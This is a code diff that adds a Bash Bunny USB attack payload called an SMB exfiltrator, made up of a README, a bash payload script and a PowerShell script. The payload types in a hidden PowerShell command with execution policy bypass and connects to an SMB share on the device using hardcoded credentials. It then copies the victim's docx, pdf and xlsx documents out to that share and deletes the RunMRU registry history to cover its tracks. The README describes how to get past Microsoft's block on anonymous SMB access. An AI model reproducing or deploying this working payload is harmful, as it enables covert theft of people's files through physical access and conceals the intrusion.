Merge pull request #392 from jblk01/master

smb_exfiltratorV2.0

payloads/library/exfiltration/smb_exfiltratorV2.0/README.md

@@ -0,0 +1,50 @@
+# Faster SMB Exfiltrator V 2.0
+
+* Author: Hak5Darren
+* Props: ImNatho, mike111b, madbuda, jblk01
+* Version: Version 1.6.1
+* Target: Windows XP SP3+ (Powershell)
+* Category: Exfiltration
+* Attackmodes: HID, Ethernet
+ 
+## Description
+
+Exfiltrates select files from users's documents folder via SMB.
+Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
+
+## Configuration
+
+Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired. 
+
+## STATUS
+
+| LED                 | Status                                 |
+| ------------------- | -------------------------------------- |
+| Red (blinking)      | Impacket not found in /pentest         |
+| Yellow Single       | Ethernet Stage                         |
+| Yellow Double       | HID Stage                              |
+| Cyan                | Receiving files                        |
+| White               | Moving liberated files to mass storage |
+| Green               | Finished                               |
+
+# NOTICE
+
+As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share.
+To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files.
+
+# Starting from a fresh Bash Bunny
+
+1. apt update ; apt install gcc
+2. pip install impacket
+3. cd /tools/
+4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
+5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
+6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password'
+
+Both the username and the password have been set as 'user' and 'Password01' respectively.
+
+# Changes to the payload.txt include:
+
+* Support for SMB version 2 enabled.
+* Username and password set to bypass Microsoft's disallowing of anonymous access.
+* Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.

payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt

@@ -0,0 +1,85 @@
+#!/bin/bash
+#
+# Title:         Faster SMB Exfiltrator version 2.0
+# Author:        Hak5Darren
+# Props:         ImNatho, mike111b, madbuda, jblk01
+# Version:       1.6.1
+# Category:      Exfiltration
+# Target:        Windows XP SP3+ (Powershell)
+# Attackmodes:   HID, Ethernet
+#
+# REQUIREMENTS
+# ============
+# SETUP:
+#
+# 1. apt update ; apt install gcc
+# 2. pip install impacket
+# 3. cd /tools/
+# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
+# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
+#
+#
+# LED STATUS
+# ==========
+# FAIL........Failed to find dependencies
+# STAGE1......Ethernet Stage
+# STAGE2......HID Stage
+# SPECIAL.....Receiving Files
+# CLEANUP.....Moving Liberated Files
+# FINISH......Finished
+#
+# OPTIONS
+# =======
+# Exfiltration options configured from included s.ps1 script
+
+
+######## INITIALIZATION ########
+REQUIRETOOL impacket
+GET SWITCH_POSITION
+# Make temporary loot directory
+mkdir -p /loot/smb/
+# Delete any old exfiltration data
+rm -rf /loot/smb/*
+# Copy new powershell payload to smb share
+cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
+# Make loot directory on USB Disk
+mkdir -p /root/udisk/loot/smb_exfiltrator
+
+
+######## ETHERNET STAGE ########
+LED STAGE1
+ATTACKMODE RNDIS_ETHERNET
+# Start the SMB Server
+python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
+
+
+######## HID STAGE ########
+# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
+GET HOST_IP
+LED STAGE2
+ATTACKMODE HID RNDIS_ETHERNET
+RUN WIN powershell
+Q DELAY 1000
+Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
+Q DELAY 500
+Q ENTER
+LED SPECIAL
+# Wait until files are done copying
+while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
+
+
+######## CLEANUP ########
+LED CLEANUP
+# Delete EXFILTRATION_COMPLETE file
+rm -rf /loot/smb/EXFILTRATION_COMPLETE
+# Move files to udisk loot directory
+mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
+# Clean up temporary loot directory
+rm -rf /loot/smb/e/*
+# Sync file system
+sync
+
+
+######## FINISH ########
+# Trap is clean
+LED FINISH

payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1

@@ -0,0 +1,9 @@
+$exfil_dir="$Env:UserProfile\Documents"
+$exfil_ext="*.docx"
+$exfil_ext1="*.pdf"
+$exfil_ext2="*.xlsx"
+$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
+mkdir $loot_dir
+robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z
+New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue